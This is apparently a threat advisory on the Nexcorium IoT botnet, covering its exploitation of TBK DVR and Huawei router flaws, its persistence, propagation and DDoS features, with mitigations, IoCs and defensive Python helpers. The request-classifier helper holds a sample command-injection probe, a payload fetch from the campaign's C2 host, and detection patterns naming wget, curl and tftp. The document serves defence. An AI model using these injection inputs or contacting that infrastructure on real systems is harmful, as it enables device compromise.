
Nexcorium: IoT Botnet Campaign Exploiting TBK DVR Devices

Red | Attack Report
Summary

Nexcorium is a multi-architecture Mirai botnet variant first observed in 2026. It is an active IoT botnet campaign that exploits vulnerabilities in TBK DVR devices and Huawei routers to build large-scale distributed denial-of-service attack infrastructure. The Nexcorium botnet is deployed through exploitation of CVE-2024-3721, a critical OS command injection vulnerability affecting TBK DVR-4104 and TBK DVR-4216 devices; both are end-of-life products with no available security patches. Nexcorium threat actors manipulate HTTP request parameters on vulnerable TBK DVR endpoints to deliver a downloader shell script that fetches architecture-specific malware payloads compiled for ARM, MIPS R3000, and x86-64/AMD64 platforms.

Once the Nexcorium botnet malware establishes a foothold on a compromised IoT device, it persists through multiple system-level mechanisms, including modifications to /etc/inittab, /etc/rc.local, systemd services, and cron jobs. The botnet propagates laterally by brute-forcing adjacent IoT devices via Telnet using an extensive hard-coded credential list of default usernames and passwords commonly found on DVRs, IP cameras, and routers. Nexcorium also includes a built-in exploit for CVE-2017-17215 targeting Huawei HG532 routers to expand the botnet infrastructure.

The primary objective of the Nexcorium campaign is launching large-scale distributed denial-of-service attacks via centralized command-and-control infrastructure hosted at r3brqw3d[.]b0ats[.]top. Nexcorium supports a wide range of DDoS flood techniques, including UDP floods, TCP SYN floods, ACK floods, PSH floods, URG floods, SMTP floods, and VSE query attacks. The campaign is attributed to the Nexus Team based on a custom HTTP header, “X-Hacked-By: Nexus Team – Exploited By Erratic”, embedded in exploit traffic.
The Nexcorium botnet represents a significant threat to organizations operating unpatched end-of-life TBK DVR surveillance systems and other IoT devices with default credentials exposed to the internet.

Attack Details

Nexcorium Initial Compromise: CVE-2024-3721 Exploitation and Payload Delivery

Security researchers have uncovered an active Nexcorium campaign in which threat actors are exploiting vulnerabilities in TBK DVR devices to propagate a new Mirai-based botnet variant dubbed Nexcorium across worldwide IoT infrastructure. The Nexcorium intrusion begins with the abuse of CVE-2024-3721, a critical OS command injection flaw affecting end-of-life TBK DVR-4104 and DVR-4216 surveillance models that no longer receive security updates. By targeting the /device.rsp?opt=sys&cmd= endpoint on vulnerable TBK DVR devices and manipulating the mdb/mdc parameters in HTTP requests, Nexcorium attackers are able to remotely execute arbitrary system commands with elevated privileges. Notably, the Nexcorium exploit traffic carries a custom HTTP header reading “X-Hacked-By: Nexus Team – Exploited By Erratic”, which serves as a potential attribution clue linking the Nexcorium activity to the Nexus Team threat actor group. Once initial access is gained through CVE-2024-3721 exploitation, a shell-based downloader script named “dvr” is deployed on the compromised TBK DVR device. This Nexcorium downloader retrieves architecture-specific malware payloads compiled for ARM, MIPS R3000, and x86-64/AMD64 platforms, all labeled with the nexuscorp prefix. The Nexcorium downloader assigns full execution permissions to the downloaded payloads and executes them with device-specific arguments to establish persistent botnet infection.

Nexcorium Malware Structure: Watchdog, Scanner, and Attack Modules

Once the Nexcorium payload executes on the compromised IoT device, it announces its presence with the message “nexuscorp has taken control” before initiating its core operational routines. The internal structure of the Nexcorium malware closely aligns with the traditional Mirai botnet framework, comprising three primary components that enable persistent botnet operation: a watchdog module, a scanner module, and an attack module. Nexcorium configuration data, including command-and-control server details, persistence instructions, embedded exploits, and a comprehensive brute-force credential list, is obfuscated using XOR encoding with keys 0x13 and 0xFD to evade signature-based detection. The Nexcorium watchdog module, identifiable by the marker “NXS_WD_CHILD”, ensures process resilience by continuously supervising child operations and restarting failed processes. To maintain binary integrity and resist tampering, the Nexcorium malware computes a hash of its own binary using the FNV-1a algorithm during execution. If the hash does not match, indicating potential modification or corruption, the malware regenerates itself under a new randomly generated filename with restricted permissions, reinforcing operational continuity and complicating forensic analysis.
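The two primitives described above, byte-wise XOR string obfuscation and an FNV-1a self-hash, are small enough to reproduce as an analyst's triage helper. The block below is an added example, not code from the advisory or from the Nexcorium sample. It assumes the keys 0x13 and 0xFD are applied byte-wise to NUL-terminated strings in a Mirai-style table and that the hash is the 32-bit FNV-1a variant; the advisory states neither the key width nor the hash width. SAMPLE_BLOB is constructed here from two strings the advisory does name (the C2 domain, kept defanged, and the watchdog marker).

```python
from __future__ import annotations
import re

# Added analyst helper (not the advisory's or the malware's code).
# Assumption: single-byte XOR keys over NUL-terminated strings; 32-bit FNV-1a.

NEXCORIUM_XOR_KEYS = (0x13, 0xFD)   # keys reported in the advisory


def xor_bytes(data: bytes, key: int) -> bytes:
    """Byte-wise XOR with a single-byte key; encoding and decoding are the same op."""
    return bytes(b ^ (key & 0xFF) for b in data)


def fnv1a_32(data: bytes) -> int:
    """FNV-1a, 32-bit: XOR each byte in, then multiply by the FNV prime."""
    h = 0x811C9DC5
    for b in data:
        h ^= b
        h = (h * 0x01000193) & 0xFFFFFFFF
    return h


def integrity_check(image: bytes, expected: int) -> bool:
    """The self-check the advisory describes: hash the image and compare."""
    return fnv1a_32(image) == expected


def recover_strings(blob: bytes, keys=NEXCORIUM_XOR_KEYS, min_len: int = 6) -> dict[int, list[str]]:
    """Decode the blob under each candidate key and keep printable ASCII runs.

    For this key pair the wrong key maps ASCII to high-bit bytes (0x13 ^ 0xFD = 0xEE),
    so only the correct key produces a printable run of min_len or more.
    """
    found: dict[int, list[str]] = {}
    for key in keys:
        decoded = xor_bytes(blob, key)
        runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, decoded)
        found[key] = [r.decode("ascii") for r in runs]
    return found


# Constructed sample: two config strings, each obfuscated under a different key
# and NUL-terminated, the way a Mirai-style table might hold them.
SAMPLE_BLOB = (
    xor_bytes(b"r3brqw3d[.]b0ats[.]top\x00", 0x13)
    + xor_bytes(b"NXS_WD_CHILD\x00", 0xFD)
)

if __name__ == "__main__":
    for key, strings in recover_strings(SAMPLE_BLOB).items():
        print(f"key 0x{key:02X}: {strings}")
    print(f"fnv1a_32(b'a') = 0x{fnv1a_32(b'a'):08X}")
```

Running the block prints the C2 domain under key 0x13 and the watchdog marker under key 0xFD. The same recover_strings() call over a real configuration region would be the first step in extracting the credential list and C2 details from a sample without executing it.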

Nexcorium Propagation: Dual-Strategy Exploitation and Credential Attacks

For lateral propagation and botnet expansion, Nexcorium uses a dual strategy that combines vulnerability exploitation with credential-based attacks. The malware includes a built-in exploit for CVE-2017-17215, a remote code execution vulnerability in end-of-life Huawei HG532 routers that remain widely deployed despite the lack of vendor support. This Huawei exploit is decoded at runtime in Nexcorium memory and delivered via crafted network packets to vulnerable routers on the local network. In parallel with exploitation, Nexcorium conducts aggressive Telnet-based brute-force attacks using an extensive hard-coded credential list of common and vendor-default usernames and passwords such as admin, 12345, hikvision, default, and numerous manufacturer-specific credentials. Upon successful Telnet authentication, the Nexcorium scanner validates the shell environment using commands like system, sh, and cat /bin/busybox to confirm that BusyBox is available. The scanner then identifies the device architecture through system fingerprinting and deploys the payload variant matching the target’s processor architecture, ensuring successful infection across diverse IoT hardware platforms.

Nexcorium Persistence and DDoS Attack Capabilities

After establishing a foothold on compromised IoT devices, Nexcorium embeds itself deeply within the Linux system to ensure persistence across reboots and prevent easy removal. The Nexcorium malware copies its binary to /usr/local/bin/sysd and implements four separate persistence mechanisms to maximize survivability: modifying /etc/inittab for automatic process respawning, adding execution commands to /etc/rc.local for startup execution, creating a systemd service at /etc/systemd/system/persist.service for service-based persistence, and scheduling execution through cron jobs for periodic reinfection. To complicate forensic analysis and incident response efforts, the Nexcorium original binary is deleted immediately post-installation, leaving only the persistent copies in system directories. The primary objective of the Nexcorium botnet is conducting large-scale distributed denial-of-service operations on behalf of the botnet operators. Nexcorium supports a comprehensive range of DDoS flood techniques including UDP floods, TCP SYN floods, ACK floods, PSH floods, URG floods, SMTP floods, and VSE query attacks, providing botnet operators with flexible attack capabilities. Communication with the Nexcorium command-and-control infrastructure hosted at r3brqw3d[.]b0ats[.]top enables dynamic command execution, including directives to launch coordinated DDoS attacks against specified targets, halt ongoing attack operations (killattk), or terminate the bot instance entirely (botkill) to cover tracks or avoid detection.

Recommendations

Isolate or Replace End-of-Life TBK DVR Devices

TBK DVR-4104 and DVR-4216 surveillance models are end-of-life products that no longer receive firmware updates or security patches from the vendor, leaving them permanently vulnerable to Nexcorium exploitation. Organizations still operating these devices should immediately disconnect them from internet-facing networks to prevent Nexcorium infection. Restrict management access to these vulnerable TBK DVR devices to trusted internal subnets only, using network segmentation and firewall rules. Prioritize replacing end-of-life TBK DVR systems with actively supported surveillance alternatives that receive regular security updates from their manufacturers. Because no patch is available for CVE-2024-3721, network isolation or device replacement is the only effective mitigation against Nexcorium botnet recruitment.

Replace Default Credentials on All IoT Devices

Change all factory-default usernames and passwords on DVRs, routers, IP cameras, and other IoT devices immediately to prevent Nexcorium credential-based propagation. The Nexcorium malware carries an extensive hard-coded wordlist targeting common default credentials such as admin, 12345, hikvision, default, and numerous vendor-specific credential pairs. Implement strong, unique passwords that meet organizational password complexity requirements for all IoT device administrative interfaces. Enforce credential rotation policies to limit the window of exposure if credentials are compromised. Document all credential changes in secure password management systems and ensure administrative access is properly controlled.

Disable Telnet Services on IoT Devices

Disable Telnet services on all networked IoT devices where SSH or other secure management protocols are available as alternatives. The Nexcorium scanner module relies heavily on Telnet-based brute-force attacks for lateral propagation across IoT infrastructure. Disabling Telnet eliminates a primary attack vector used by Nexcorium for botnet expansion. For devices that require remote management, configure SSH with public key authentication instead of password authentication to prevent brute-force attacks. If Telnet cannot be disabled due to device limitations, implement network-level access controls to restrict Telnet access to specific trusted management hosts only.

Deploy IPS Signatures for CVE-2024-3721 and CVE-2017-17215

Enable intrusion prevention system signatures that detect exploitation attempts against the TBK DVR command injection vulnerability (CVE-2024-3721) and the Huawei HG532 remote code execution vulnerability (CVE-2017-17215). Configure IPS rules to block HTTP requests targeting the /device.rsp endpoint with suspicious mdb/mdc parameters characteristic of Nexcorium exploitation. Monitor for and block outbound connections from IoT devices to known Nexcorium command-and-control infrastructure. Deploy network behavior analysis to identify IoT devices exhibiting unusual scanning or flooding behavior indicative of Nexcorium infection.
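The detection logic behind such a rule can be tested offline against captured request heads. The block below is an added example, not a rule from the advisory or from any IPS vendor: it parses a raw HTTP/1.x request and flags the three traits the advisory describes (the /device.rsp?opt=sys&cmd= endpoint, shell metacharacters in mdb/mdc, and the X-Hacked-By header), plus a Host header matching the C2 domain. The indicator names, the SHELL_META pattern, and the sample requests are constructed for this example; the header value uses an ASCII hyphen where the advisory prints an en-dash.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs, urlsplit

# Added detection example (not the advisory's or any IPS product's rule).
# Indicator names, SHELL_META and the sample requests below are constructed.

C2_DOMAIN_DEFANGED = "r3brqw3d[.]b0ats[.]top"   # from the advisory, defanged

# Characters and tokens that have no business in a DVR parameter value.
SHELL_META = re.compile(r"[;|`&$<>(){}\\\n]|\b(?:wget|curl|tftp)\b")


def refang(indicator: str) -> str:
    """Turn 'a[.]b' into 'a.b' so a defanged IoC can be compared with live logs."""
    return indicator.replace("[.]", ".")


def parse_request(raw: bytes) -> tuple[str, str, dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, target, lower-cased headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0]
    target = parts[1] if len(parts) > 1 else "/"
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify_request(raw: bytes) -> list[str]:
    """Return the list of Nexcorium-related indicators a request head matches."""
    _method, target, headers = parse_request(raw)
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)   # %xx-decodes values
    hits: list[str] = []

    # Trait 1: the TBK DVR endpoint abused by CVE-2024-3721 exploitation.
    if url.path == "/device.rsp" and query.get("opt") == ["sys"] and "cmd" in query:
        hits.append("tbk-dvr-device-rsp-sys-cmd")
        # Trait 2: injection characters inside the mdb/mdc parameters.
        for param in ("mdb", "mdc"):
            if any(SHELL_META.search(v) for v in query.get(param, [])):
                hits.append(f"tbk-dvr-{param}-shell-metachar")

    # Trait 3: the attribution header seen in exploit traffic.
    if "x-hacked-by" in headers:
        hits.append("nexus-team-x-hacked-by-header")

    # Egress side: a request whose Host is the C2 domain (payload retrieval or beacon).
    host = headers.get("host", "").split(":")[0].lower()
    if host == refang(C2_DOMAIN_DEFANGED):
        hits.append("nexcorium-c2-host")
    return hits


# Constructed samples (RFC 5737 documentation address; the /bins/ path is made up).
BENIGN_REQUEST = b"GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
PROBE_REQUEST = (
    b"GET /device.rsp?opt=sys&cmd=status&mdb=sos&mdc=%3Buname HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"X-Hacked-By: Nexus Team - Exploited By Erratic\r\n\r\n"
)
C2_REQUEST = b"GET /bins/nexuscorp.arm HTTP/1.1\r\nHost: r3brqw3d.b0ats.top\r\n\r\n"

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN_REQUEST), ("probe", PROBE_REQUEST), ("c2", C2_REQUEST)):
        print(f"{name}: {classify_request(raw)}")
```

The endpoint check alone would also fire on legitimate DVR management traffic, which is why the rule layers the parameter and header traits on top of it; in production, alert on the endpoint match and block on the metacharacter or header match.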

Monitor for Nexcorium Persistence Artifacts

Proactively hunt for unauthorized modifications to Linux persistence mechanisms on IoT devices. Specifically monitor for unexpected changes to /etc/inittab, /etc/rc.local, and /etc/systemd/system/persist.service files that indicate Nexcorium persistence establishment. Search for unexpected cron job entries that execute suspicious binaries. Identify unauthorized binaries located at /usr/local/bin/sysd on Linux-based IoT devices, as this is the standard Nexcorium installation path. Regular automated auditing of these persistence locations can enable early detection of Nexcorium infections before DDoS attacks are launched. Implement file integrity monitoring on critical system files to alert on unauthorized modifications.
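The audit described above can be scripted against a device root filesystem (a mounted or copied rootfs during analysis, or "/" on a device that has Python). The block below is an added example, not the advisory's tooling: the file paths come from the advisory, while the cron directories, the SUSPICIOUS_LINE pattern, and the small fake root built by build_sample_root() are constructed for this example.

```python
from __future__ import annotations
import os
import re
import tempfile
from pathlib import Path

# Added hunting example (not the advisory's or any vendor's tooling).
# Paths named in the advisory:
WATCH_FILES = ("etc/inittab", "etc/rc.local", "etc/systemd/system/persist.service")
SYSD_PATH = "usr/local/bin/sysd"
# Constructed: common BusyBox/cron locations to sweep for scheduled reinfection.
CRON_DIRS = ("etc/cron.d", "etc/crontabs", "var/spool/cron", "var/spool/cron/crontabs")
# Constructed: lines that reference the known install path or the payload prefix,
# or that pipe a downloaded file into a shell.
SUSPICIOUS_LINE = re.compile(r"/usr/local/bin/sysd\b|nexuscorp|\b(?:wget|curl|tftp)\b.*\|\s*sh\b")


def audit_persistence(root: str | os.PathLike) -> list[tuple[str, str]]:
    """Return (artifact path relative to root, detail) findings."""
    root = Path(root)
    findings: list[tuple[str, str]] = []

    if (root / SYSD_PATH).exists():
        findings.append((SYSD_PATH, "binary present at known Nexcorium install path"))
    if (root / "etc/systemd/system/persist.service").exists():
        findings.append(("etc/systemd/system/persist.service", "service unit named in the advisory exists"))

    candidates = [root / f for f in WATCH_FILES]
    for d in CRON_DIRS:
        cron_dir = root / d
        if cron_dir.is_dir():
            candidates.extend(p for p in cron_dir.iterdir() if p.is_file())

    for path in candidates:
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            if SUSPICIOUS_LINE.search(line):
                findings.append((str(path.relative_to(root)), f"line {lineno}: {line.strip()}"))
    return findings


def build_sample_root(base: str | os.PathLike | None = None) -> Path:
    """Construct a fake rootfs: one clean file and four artifacts matching the advisory."""
    root = Path(base) if base is not None else Path(tempfile.mkdtemp(prefix="nexcorium-audit-"))
    for d in ("etc/systemd/system", "etc/cron.d", "usr/local/bin"):
        (root / d).mkdir(parents=True, exist_ok=True)
    (root / "etc/inittab").write_text("::sysinit:/etc/init.d/rcS\n::respawn:/usr/local/bin/sysd\n")
    (root / "etc/rc.local").write_text("#!/bin/sh\nexit 0\n")          # clean
    (root / "etc/systemd/system/persist.service").write_text("[Service]\nExecStart=/usr/local/bin/sysd\n")
    (root / "etc/cron.d/persist").write_text("* * * * * root /usr/local/bin/sysd\n")
    (root / "usr/local/bin/sysd").write_bytes(b"\x7fELF placeholder")  # not a real binary
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_root()
    for artifact, detail in audit_persistence(target):
        print(f"[!] {artifact}: {detail}")
```

On the sample root the audit reports five findings: the sysd binary, the persist.service unit (once for existing, once for its ExecStart line), the inittab respawn entry, and the cron.d entry; the untouched rc.local produces nothing. Feeding the same function a clean rootfs image gives a baseline to diff against on each scheduled run.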

Segment IoT Networks with Strict Egress Filtering

Place all IoT and surveillance devices on dedicated VLANs with strict egress filtering policies to contain potential Nexcorium infections. Prevent IoT network segments from initiating outbound connections to the internet except through approved proxy or filtering gateways that can inspect and block malicious traffic. Implement network segmentation that isolates IoT devices from corporate networks and critical infrastructure. Configure firewall rules that deny inter-VLAN communication between IoT segments and production networks. This defense-in-depth approach limits the blast radius of Nexcorium infections and prevents compromised IoT devices from attacking internal resources or participating in external DDoS campaigns.

Implement DDoS Mitigation Controls

Deploy upstream DDoS mitigation services capable of absorbing or deflecting volumetric flood attacks generated by Nexcorium-infected botnets. Implement rate-limiting rules at network perimeters to detect and throttle UDP floods, TCP SYN floods, TCP ACK floods, and SMTP floods characteristic of Nexcorium DDoS attacks. Configure anomaly detection systems that baseline normal traffic patterns and alert on sudden traffic spikes indicative of DDoS activity. Establish relationships with internet service providers and DDoS mitigation vendors to enable rapid activation of scrubbing services when attacks occur. Regularly test DDoS response procedures to ensure organizational readiness for Nexcorium-generated attacks.

MITRE ATT&CK TTPs

Initial Access

  • T1190: Exploit Public-Facing Application

Execution

  • T1059: Command and Scripting Interpreter

Persistence

  • T1037: Boot or Logon Initialization Scripts (T1037.004: RC Scripts)
  • T1053: Scheduled Task/Job (T1053.003: Cron)
  • T1543: Create or Modify System Process (T1543.002: Systemd Service)

Defense Evasion

  • T1140: Deobfuscate/Decode Files or Information
  • T1070: Indicator Removal (T1070.004: File Deletion)

Credential Access

  • T1110: Brute Force (T1110.001: Password Guessing)

Discovery

  • T1082: System Information Discovery

Lateral Movement

  • T1021: Remote Services

Command and Control

  • T1071: Application Layer Protocol (T1071.001: Web Protocols)

Impact

  • T1498: Network Denial of Service

Indicators of Compromise (IoCs)

Nexcorium Command-and-Control Infrastructure (IPv4)

  • 84[.]200[.]87[.]36
  • 176[.]65[.]148[.]186

Nexcorium Command-and-Control Domain

  • r3brqw3d[.]b0ats[.]top

Nexcorium Malware File Hashes (SHA256)

  • 696aeb6321313919f0a41a520e6fa715450bbfb271a9add1e54efe16484a9c35
  • 37132e804ccb3fc4ba1f72205da70c3d7a6e66b43178707a9d8ee1156d815c21
  • e4789416c35b345e75c023a8c07c207c79937c6a5444e1c29d85d18d2f660d8c
  • 0b510f93f47590791626d2fa74ddd62ba6eb8a5a5bb7b8476c0ceffc7be94ebe
  • 9b805585c457811d2c5c5664ede9ee869b53e3c9999100505d7ee8de7f855fdf
  • 95d1eb12d58206319c514c7240d058c512bb22b31f6ea22ed8be3ae44305c9f7
  • 7c01d5b53861cd34e10a79fdea16dcf08bce9c78ed72abd6d6f3e9ce75a24734
  • 838e35b62a6b38675e467301166cdcc54f98d528fe43d56936caeffec88ac696
  • 2ccf23b8165e8c05899aa7ba4755b896ebf1d20d3b701cffdc768482486b0a74
  • 29404df12a7723ce46c8b199c88a808aa315dd8ff8fd1e06a34ccd3d16f4553b
  • b1274de00a7f3d7ab9792ec3456e9d5bf057738666f34183f1d72060e2d4f678
  • 721c7cb2109ec97c14413cb8b58ddce0ecf0c1f13f22ee4f72eed79b57592cf5
  • 89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400
